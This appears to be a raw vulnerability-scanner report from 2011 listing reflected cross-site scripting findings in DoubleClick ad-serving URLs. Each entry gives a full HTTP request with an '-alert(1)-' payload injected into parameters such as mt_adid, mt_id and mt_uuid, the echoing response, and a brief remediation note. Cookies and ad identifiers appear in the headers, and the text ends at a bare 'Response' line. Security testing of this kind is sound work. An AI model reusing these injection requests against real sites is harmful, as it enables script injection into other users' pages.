GET /adi/N5956.Google/B3941858.12;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BuhlESOmMTaTqLsW6lQeZ4K2JCMy95NwB5MGbzhnAjbcBwMmjARABGAEgvs7lDTgAUOO0w5sGYMkGoAHw7Iz1A7oBCTcyOHg5MF9hc8gBCdoBQWZpbGU6Ly8vQzovY2RuL2V4YW1wbGVzL25ldHNwYXJrZXIvd3d3LnNvdW5kaW5nc29ubGluZS5jb21fODAuaHRtuAIYyAKUpN0RqAMB0QNftM276KVd5OgDxwb1AwIAAMQ&num=1&sig=AGiWqtyxZvX1KKMfNg9J_efkBZftCuyf_A13934"-alert(1)-"2f40d37216e&client=ca-pub-4063878933780912&adurl=;ord=1246807419? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1301098441&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fnetsparker%2Fwww.soundingsonline.com_80.htm&dt=1301080440634&bpp=4&shv=r20110315&jsv=r20110321-2&correlator=1301080441371&frm=0&adk=1607234649&ga_vid=967180559.1301080441&ga_sid=1301080441&ga_hid=295407676&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1410&bih=979&eid=44901217&fu=0&ifi=1&dtd=764&xpc=MMXNXDQ6lh&p=file%3A// User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 6885 Date: Fri, 25 Mar 2011 19:16:11 GMT Vary: Accept-Encoding Expires: Fri, 25 Mar 2011 19:16:11 GMT Cache-Control: private, x-gzip-ok=""
<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Thu Feb 10 14:47:14 EST 2011 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]... 1A7oBCTcyOHg5MF9hc8gBCdoBQWZpbGU6Ly8vQzovY2RuL2V4YW1wbGVzL25ldHNwYXJrZXIvd3d3LnNvdW5kaW5nc29ubGluZS5jb21fODAuaHRtuAIYyAKUpN0RqAMB0QNftM276KVd5OgDxwb1AwIAAMQ&num=1&sig=AGiWqtyxZvX1KKMfNg9J_efkBZftCuyf_A13934"-alert(1)-"2f40d37216e&client=ca-pub-4063878933780912&adurl=http%3a%2f%2flearning.capella.edu/banners.aspx%3Frevkey%3D151364"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ""; var ...[SNIP]...
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a9c8a"-alert(1)-"74dc35f103c was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5956.Google/B3941858.12;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=la9c8a"-alert(1)-"74dc35f103c&ai=BuhlESOmMTaTqLsW6lQeZ4K2JCMy95NwB5MGbzhnAjbcBwMmjARABGAEgvs7lDTgAUOO0w5sGYMkGoAHw7Iz1A7oBCTcyOHg5MF9hc8gBCdoBQWZpbGU6Ly8vQzovY2RuL2V4YW1wbGVzL25ldHNwYXJrZXIvd3d3LnNvdW5kaW5nc29ubGluZS5jb21fODAuaHRtuAIYyAKUpN0RqAMB0QNftM276KVd5OgDxwb1AwIAAMQ&num=1&sig=AGiWqtyxZvX1KKMfNg9J_efkBZftCuyf_A&client=ca-pub-4063878933780912&adurl=;ord=1246807419? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1301098441&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fnetsparker%2Fwww.soundingsonline.com_80.htm&dt=1301080440634&bpp=4&shv=r20110315&jsv=r20110321-2&correlator=1301080441371&frm=0&adk=1607234649&ga_vid=967180559.1301080441&ga_sid=1301080441&ga_hid=295407676&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1410&bih=979&eid=44901217&fu=0&ifi=1&dtd=764&xpc=MMXNXDQ6lh&p=file%3A// User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 6885 Date: Fri, 25 Mar 2011 19:13:57 GMT Vary: Accept-Encoding Expires: Fri, 25 Mar 2011 19:13:57 GMT Cache-Control: private, x-gzip-ok=""
<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Thu Feb 10 14:47:14 EST 2011 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]... l = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3ad5/f/18f/%2a/p%3B236512240%3B4-0%3B0%3B41471883%3B3454-728/90%3B40692123/40709910/1%3B%3B%7Esscs%3D%3fhttp://googleads.g.doubleclick.net/aclk?sa=la9c8a"-alert(1)-"74dc35f103c&ai=BuhlESOmMTaTqLsW6lQeZ4K2JCMy95NwB5MGbzhnAjbcBwMmjARABGAEgvs7lDTgAUOO0w5sGYMkGoAHw7Iz1A7oBCTcyOHg5MF9hc8gBCdoBQWZpbGU6Ly8vQzovY2RuL2V4YW1wbGVzL25ldHNwYXJrZXIvd3d3LnNvdW5kaW5nc29ubGluZS5jb21fODAuaHRt ...[SNIP]...
The value of the mt_adid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a46e1"-alert(1)-"4aa4ff748f7 was submitted in the mt_adid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N553.mediamath/B5123370.3;sz=728x90;click1=http://pixel.mathtag.com/click/img?mt_aid=54393751066380379&mt_id=109664&mt_adid=70a46e1"-alert(1)-"4aa4ff748f7&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=;ord=54393751066380379? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://bidder.mathtag.com/iframe/notify?exch=adx&id=5aW95q2jLzEvUTBGRlUwVkphRFJpVVU5RVQzbFJWa3h3UlZsUlRIVnZObUZCL05HUTFZakl6TnpFdE16a3lPQzAzWVRnekxUSTBabUl0WkRVeU16STRaalUyTWpSaS81NDM5Mzc1MTA2NjM4MDM3OS8xMDk2NjQvMTAyMTY4LzQvcUNrUlV0a2tSODZTZllSNWtDMUZwcG5NelEyY2tlaWdSdTZMeEpRUzkyRS8/MpDSwvg5GdsMNZTleYApVCKa2Fo&price=TY1DWwAGmFoK5X_Ef7dLZSWZTQqUNqdlAdKhdw&dck=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBOV_6W0ONTdqwGsT_lQfllt39B9zvj_EB5PW9vBGs6YOTEgAQARgBIAA4AVCAx-HEBGDJBoIBF2NhLXB1Yi01ODEyNzMxOTQxMTcwNTgzoAHg6pnsA7IBF3d3dy5zb3VuZGluZ3NvbmxpbmUuY29tugEJNzI4eDkwX2FzyAEJ2gFKaHR0cDovL3d3dy5zb3VuZGluZ3NvbmxpbmUuY29tL2FyY2hpdmVzLytOU0ZUVys_b3JkZXJpbmc9JnNlYXJjaHBocmFzZT1hbGyYAtQWwAIEyALWwYwOqAMB6APLA_UDAAAAxIAGg5z-k4L07Phv%26num%3D1%26sig%3DAGiWqtx9q6AzNXuiMRPfKd7knjv7C82atQ%26client%3Dca-pub-5812731941170583%26adurl%3D User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 6999 Date: Sat, 26 Mar 2011 01:38:24 GMT Vary: Accept-Encoding Expires: Sat, 26 Mar 2011 01:38:24 GMT Cache-Control: private, x-gzip-ok=""
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Dec 02 10:42:52 EST 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... click%3Bh%3Dv8/3ad6/f/a6/%2a/k%3B235630582%3B0-0%3B0%3B59396910%3B3454-728/90%3B39654880/39672667/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=54393751066380379&mt_id=109664&mt_adid=70a46e1"-alert(1)-"4aa4ff748f7&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=https%3a%2f%2fwww232.americanexpress.com/BOLWeb/bolfeOrder.do%3Frequest_type%3DorderProduct%26promotion%3DACP%26program%3DACPBUS%26selleracctnbr%3 ...[SNIP]...
The value of the mt_adid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a9f72'-alert(1)-'29bf1bc4357 was submitted in the mt_adid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N553.mediamath/B5123370.3;sz=728x90;click1=http://pixel.mathtag.com/click/img?mt_aid=54393751066380379&mt_id=109664&mt_adid=70a9f72'-alert(1)-'29bf1bc4357&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=;ord=54393751066380379? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://bidder.mathtag.com/iframe/notify?exch=adx&id=5aW95q2jLzEvUTBGRlUwVkphRFJpVVU5RVQzbFJWa3h3UlZsUlRIVnZObUZCL05HUTFZakl6TnpFdE16a3lPQzAzWVRnekxUSTBabUl0WkRVeU16STRaalUyTWpSaS81NDM5Mzc1MTA2NjM4MDM3OS8xMDk2NjQvMTAyMTY4LzQvcUNrUlV0a2tSODZTZllSNWtDMUZwcG5NelEyY2tlaWdSdTZMeEpRUzkyRS8/MpDSwvg5GdsMNZTleYApVCKa2Fo&price=TY1DWwAGmFoK5X_Ef7dLZSWZTQqUNqdlAdKhdw&dck=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBOV_6W0ONTdqwGsT_lQfllt39B9zvj_EB5PW9vBGs6YOTEgAQARgBIAA4AVCAx-HEBGDJBoIBF2NhLXB1Yi01ODEyNzMxOTQxMTcwNTgzoAHg6pnsA7IBF3d3dy5zb3VuZGluZ3NvbmxpbmUuY29tugEJNzI4eDkwX2FzyAEJ2gFKaHR0cDovL3d3dy5zb3VuZGluZ3NvbmxpbmUuY29tL2FyY2hpdmVzLytOU0ZUVys_b3JkZXJpbmc9JnNlYXJjaHBocmFzZT1hbGyYAtQWwAIEyALWwYwOqAMB6APLA_UDAAAAxIAGg5z-k4L07Phv%26num%3D1%26sig%3DAGiWqtx9q6AzNXuiMRPfKd7knjv7C82atQ%26client%3Dca-pub-5812731941170583%26adurl%3D User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 6999 Date: Sat, 26 Mar 2011 01:38:28 GMT Vary: Accept-Encoding Expires: Sat, 26 Mar 2011 01:38:28 GMT Cache-Control: private, x-gzip-ok=""
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Dec 02 10:42:52 EST 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... click%3Bh%3Dv8/3ad6/f/a6/%2a/k%3B235630582%3B0-0%3B0%3B59396910%3B3454-728/90%3B39654880/39672667/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=54393751066380379&mt_id=109664&mt_adid=70a9f72'-alert(1)-'29bf1bc4357&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=https%3a%2f%2fwww232.americanexpress.com/BOLWeb/bolfeOrder.do%3Frequest_type%3DorderProduct%26promotion%3DACP%26program%3DACPBUS%26selleracctnbr%3 ...[SNIP]...
The value of the mt_id request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 33655"-alert(1)-"02dc95746b was submitted in the mt_id parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N553.mediamath/B5123370.3;sz=728x90;click1=http://pixel.mathtag.com/click/img?mt_aid=54393751066380379&mt_id=10966433655"-alert(1)-"02dc95746b&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=;ord=54393751066380379? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://bidder.mathtag.com/iframe/notify?exch=adx&id=5aW95q2jLzEvUTBGRlUwVkphRFJpVVU5RVQzbFJWa3h3UlZsUlRIVnZObUZCL05HUTFZakl6TnpFdE16a3lPQzAzWVRnekxUSTBabUl0WkRVeU16STRaalUyTWpSaS81NDM5Mzc1MTA2NjM4MDM3OS8xMDk2NjQvMTAyMTY4LzQvcUNrUlV0a2tSODZTZllSNWtDMUZwcG5NelEyY2tlaWdSdTZMeEpRUzkyRS8/MpDSwvg5GdsMNZTleYApVCKa2Fo&price=TY1DWwAGmFoK5X_Ef7dLZSWZTQqUNqdlAdKhdw&dck=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBOV_6W0ONTdqwGsT_lQfllt39B9zvj_EB5PW9vBGs6YOTEgAQARgBIAA4AVCAx-HEBGDJBoIBF2NhLXB1Yi01ODEyNzMxOTQxMTcwNTgzoAHg6pnsA7IBF3d3dy5zb3VuZGluZ3NvbmxpbmUuY29tugEJNzI4eDkwX2FzyAEJ2gFKaHR0cDovL3d3dy5zb3VuZGluZ3NvbmxpbmUuY29tL2FyY2hpdmVzLytOU0ZUVys_b3JkZXJpbmc9JnNlYXJjaHBocmFzZT1hbGyYAtQWwAIEyALWwYwOqAMB6APLA_UDAAAAxIAGg5z-k4L07Phv%26num%3D1%26sig%3DAGiWqtx9q6AzNXuiMRPfKd7knjv7C82atQ%26client%3Dca-pub-5812731941170583%26adurl%3D User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 6995 Date: Sat, 26 Mar 2011 01:38:15 GMT Vary: Accept-Encoding Expires: Sat, 26 Mar 2011 01:38:15 GMT Cache-Control: private, x-gzip-ok=""
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Dec 02 10:42:52 EST 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... eclick.net/click%3Bh%3Dv8/3ad6/f/a5/%2a/k%3B235630582%3B0-0%3B0%3B59396910%3B3454-728/90%3B39654880/39672667/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=54393751066380379&mt_id=10966433655"-alert(1)-"02dc95746b&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=https%3a%2f%2fwww232.americanexpress.com/BOLWeb/bolfeOrder.do%3Frequest_type%3DorderProduct%26promotion%3DACP%26program%3DACPBUS%26sell ...[SNIP]...
The value of the mt_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7af1c'-alert(1)-'2429f82e180 was submitted in the mt_id parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N553.mediamath/B5123370.3;sz=728x90;click1=http://pixel.mathtag.com/click/img?mt_aid=54393751066380379&mt_id=1096647af1c'-alert(1)-'2429f82e180&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=;ord=54393751066380379? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://bidder.mathtag.com/iframe/notify?exch=adx&id=5aW95q2jLzEvUTBGRlUwVkphRFJpVVU5RVQzbFJWa3h3UlZsUlRIVnZObUZCL05HUTFZakl6TnpFdE16a3lPQzAzWVRnekxUSTBabUl0WkRVeU16STRaalUyTWpSaS81NDM5Mzc1MTA2NjM4MDM3OS8xMDk2NjQvMTAyMTY4LzQvcUNrUlV0a2tSODZTZllSNWtDMUZwcG5NelEyY2tlaWdSdTZMeEpRUzkyRS8/MpDSwvg5GdsMNZTleYApVCKa2Fo&price=TY1DWwAGmFoK5X_Ef7dLZSWZTQqUNqdlAdKhdw&dck=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBOV_6W0ONTdqwGsT_lQfllt39B9zvj_EB5PW9vBGs6YOTEgAQARgBIAA4AVCAx-HEBGDJBoIBF2NhLXB1Yi01ODEyNzMxOTQxMTcwNTgzoAHg6pnsA7IBF3d3dy5zb3VuZGluZ3NvbmxpbmUuY29tugEJNzI4eDkwX2FzyAEJ2gFKaHR0cDovL3d3dy5zb3VuZGluZ3NvbmxpbmUuY29tL2FyY2hpdmVzLytOU0ZUVys_b3JkZXJpbmc9JnNlYXJjaHBocmFzZT1hbGyYAtQWwAIEyALWwYwOqAMB6APLA_UDAAAAxIAGg5z-k4L07Phv%26num%3D1%26sig%3DAGiWqtx9q6AzNXuiMRPfKd7knjv7C82atQ%26client%3Dca-pub-5812731941170583%26adurl%3D User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 6999 Date: Sat, 26 Mar 2011 01:38:20 GMT Vary: Accept-Encoding Expires: Sat, 26 Mar 2011 01:38:20 GMT Cache-Control: private, x-gzip-ok=""
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Dec 02 10:42:52 EST 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... eclick.net/click%3Bh%3Dv8/3ad6/f/a6/%2a/k%3B235630582%3B0-0%3B0%3B59396910%3B3454-728/90%3B39654880/39672667/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=54393751066380379&mt_id=1096647af1c'-alert(1)-'2429f82e180&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=https%3a%2f%2fwww232.americanexpress.com/BOLWeb/bolfeOrder.do%3Frequest_type%3DorderProduct%26promotion%3DACP%26program%3DACPBUS%26sell ...[SNIP]...
The value of the mt_uuid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bb4ac"-alert(1)-"007c6132307 was submitted in the mt_uuid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N553.mediamath/B5123370.3;sz=728x90;click1=http://pixel.mathtag.com/click/img?mt_aid=54393751066380379&mt_id=109664&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624bbb4ac"-alert(1)-"007c6132307&redirect=;ord=54393751066380379? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://bidder.mathtag.com/iframe/notify?exch=adx&id=5aW95q2jLzEvUTBGRlUwVkphRFJpVVU5RVQzbFJWa3h3UlZsUlRIVnZObUZCL05HUTFZakl6TnpFdE16a3lPQzAzWVRnekxUSTBabUl0WkRVeU16STRaalUyTWpSaS81NDM5Mzc1MTA2NjM4MDM3OS8xMDk2NjQvMTAyMTY4LzQvcUNrUlV0a2tSODZTZllSNWtDMUZwcG5NelEyY2tlaWdSdTZMeEpRUzkyRS8/MpDSwvg5GdsMNZTleYApVCKa2Fo&price=TY1DWwAGmFoK5X_Ef7dLZSWZTQqUNqdlAdKhdw&dck=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBOV_6W0ONTdqwGsT_lQfllt39B9zvj_EB5PW9vBGs6YOTEgAQARgBIAA4AVCAx-HEBGDJBoIBF2NhLXB1Yi01ODEyNzMxOTQxMTcwNTgzoAHg6pnsA7IBF3d3dy5zb3VuZGluZ3NvbmxpbmUuY29tugEJNzI4eDkwX2FzyAEJ2gFKaHR0cDovL3d3dy5zb3VuZGluZ3NvbmxpbmUuY29tL2FyY2hpdmVzLytOU0ZUVys_b3JkZXJpbmc9JnNlYXJjaHBocmFzZT1hbGyYAtQWwAIEyALWwYwOqAMB6APLA_UDAAAAxIAGg5z-k4L07Phv%26num%3D1%26sig%3DAGiWqtx9q6AzNXuiMRPfKd7knjv7C82atQ%26client%3Dca-pub-5812731941170583%26adurl%3D User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 6999 Date: Sat, 26 Mar 2011 01:38:32 GMT Vary: Accept-Encoding Expires: Sat, 26 Mar 2011 01:38:32 GMT Cache-Control: private, x-gzip-ok=""
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Dec 02 10:42:52 EST 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... 0-0%3B0%3B59396910%3B3454-728/90%3B39654880/39672667/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=54393751066380379&mt_id=109664&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624bbb4ac"-alert(1)-"007c6132307&redirect=https%3a%2f%2fwww232.americanexpress.com/BOLWeb/bolfeOrder.do%3Frequest_type%3DorderProduct%26promotion%3DACP%26program%3DACPBUS%26selleracctnbr%3D6430098999I%26source%3Ddisplay_MM"); var fs ...[SNIP]...
The value of the mt_uuid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 95c6a'-alert(1)-'c3ace347376 was submitted in the mt_uuid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N553.mediamath/B5123370.3;sz=728x90;click1=http://pixel.mathtag.com/click/img?mt_aid=54393751066380379&mt_id=109664&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b95c6a'-alert(1)-'c3ace347376&redirect=;ord=54393751066380379? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://bidder.mathtag.com/iframe/notify?exch=adx&id=5aW95q2jLzEvUTBGRlUwVkphRFJpVVU5RVQzbFJWa3h3UlZsUlRIVnZObUZCL05HUTFZakl6TnpFdE16a3lPQzAzWVRnekxUSTBabUl0WkRVeU16STRaalUyTWpSaS81NDM5Mzc1MTA2NjM4MDM3OS8xMDk2NjQvMTAyMTY4LzQvcUNrUlV0a2tSODZTZllSNWtDMUZwcG5NelEyY2tlaWdSdTZMeEpRUzkyRS8/MpDSwvg5GdsMNZTleYApVCKa2Fo&price=TY1DWwAGmFoK5X_Ef7dLZSWZTQqUNqdlAdKhdw&dck=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBOV_6W0ONTdqwGsT_lQfllt39B9zvj_EB5PW9vBGs6YOTEgAQARgBIAA4AVCAx-HEBGDJBoIBF2NhLXB1Yi01ODEyNzMxOTQxMTcwNTgzoAHg6pnsA7IBF3d3dy5zb3VuZGluZ3NvbmxpbmUuY29tugEJNzI4eDkwX2FzyAEJ2gFKaHR0cDovL3d3dy5zb3VuZGluZ3NvbmxpbmUuY29tL2FyY2hpdmVzLytOU0ZUVys_b3JkZXJpbmc9JnNlYXJjaHBocmFzZT1hbGyYAtQWwAIEyALWwYwOqAMB6APLA_UDAAAAxIAGg5z-k4L07Phv%26num%3D1%26sig%3DAGiWqtx9q6AzNXuiMRPfKd7knjv7C82atQ%26client%3Dca-pub-5812731941170583%26adurl%3D User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb
Response
